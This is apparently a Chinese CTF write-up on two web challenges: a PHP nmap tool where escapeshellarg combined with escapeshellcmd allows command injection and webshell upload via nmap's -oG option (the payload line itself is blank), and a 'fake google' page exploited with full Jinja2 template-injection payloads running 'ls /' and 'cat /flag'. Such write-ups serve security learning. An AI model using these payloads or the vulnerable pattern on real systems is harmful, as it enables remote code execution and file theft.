nmap命令中的-oG命令可以将命令和结果写入文件。
题目:[BUUCTF 2018]Online Tool
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
代码审计:get方式上传host变量,先给字符串加一个单引号然后再进行转义
escapeshellarg函数:给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,以确保能够直接将一个字符串传入 shell 函数(也就是在单引号前面加一个’’,再用一对单引号将两部分连接)
escapeshellcmd函数:对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。(对\以及最后的没配对的引号转义)
昂 通过nmap的-oG命令实现输入可控,想到上传文件,进而想到上传一句话木马文件(反正我是想不到。。。)不过这咋利用了上面的函数,我只明白了将两部分连接起来。。。是后面又进行了转义然后单引号就没有了?
payload:
说明将hack.php上传到了这个文件中;
(蚁剑的使用注意密码的问题,太久没用忘记了上传的变量就是连接密码。)
在根目录下找到flag
复习了php的几个函数:
strrev():反转字符串;
trim():去除字符串两边的空白字符或其他预定义字符;
invtal():获取变量的整数值。
题目二:[BJDCTF 2nd]fake google
ssti注入
访问根目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
查看flag
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{% endif %}{% endfor %}